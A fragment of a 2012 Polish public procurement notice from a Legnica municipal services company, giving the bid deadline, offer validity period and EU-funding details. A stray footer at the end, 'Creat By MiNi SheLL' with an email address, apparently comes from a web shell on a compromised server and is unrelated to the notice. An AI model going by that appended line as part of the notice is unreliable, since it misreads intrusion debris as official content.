<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 09:00, miejsce: Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.
ul. Nowodworska 60
59-220 Legnica
SEKRETARIAT Ip..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com